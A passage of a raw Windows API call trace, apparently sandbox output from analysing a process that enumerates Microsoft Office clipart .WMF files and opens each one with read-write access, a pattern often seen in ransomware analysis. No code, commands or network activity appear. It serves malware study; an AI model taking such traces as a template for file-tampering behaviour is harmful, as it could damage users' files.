lpWideCharStr=0x0) returned 69 [0102.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 69 [0102.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.494] GetFileType (hFile=0x27c) returned 0x1 [0102.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.495] CloseHandle (hObject=0x27c) returned 1 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.496] AreFileApisANSI () returned 1 [0102.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 69 [0102.496] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27a2)) returned 1 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.496] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00130_.WMF", cAlternateFileName="")) returned 1 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.496] AreFileApisANSI () returned 1 [0102.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0102.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.497] AreFileApisANSI () returned 1 [0102.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 69 [0102.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.498] GetFileType (hFile=0x27c) returned 0x1 [0102.498] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.498] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.498] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.498] CloseHandle (hObject=0x27c) returned 1 [0102.498] AreFileApisANSI () returned 1 [0102.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 69 [0102.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.499] GetFileType (hFile=0x27c) returned 0x1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.499] CloseHandle (hObject=0x27c) returned 1 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.500] AreFileApisANSI () returned 1 [0102.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 69 [0102.500] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b8)) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0102.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.500] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdbb058, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcdbb058, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00148_.WMF", cAlternateFileName="")) returned 1 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0102.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.501] AreFileApisANSI () returned 1 [0102.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.502] AreFileApisANSI () returned 1 [0102.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 69 [0102.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.502] GetFileType (hFile=0x27c) returned 0x1 [0102.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.503] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.503] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.503] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.503] CloseHandle (hObject=0x27c) returned 1 [0102.503] AreFileApisANSI () returned 1 [0102.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 69 [0102.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.504] GetFileType (hFile=0x27c) returned 0x1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.504] CloseHandle (hObject=0x27c) returned 1 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.504] 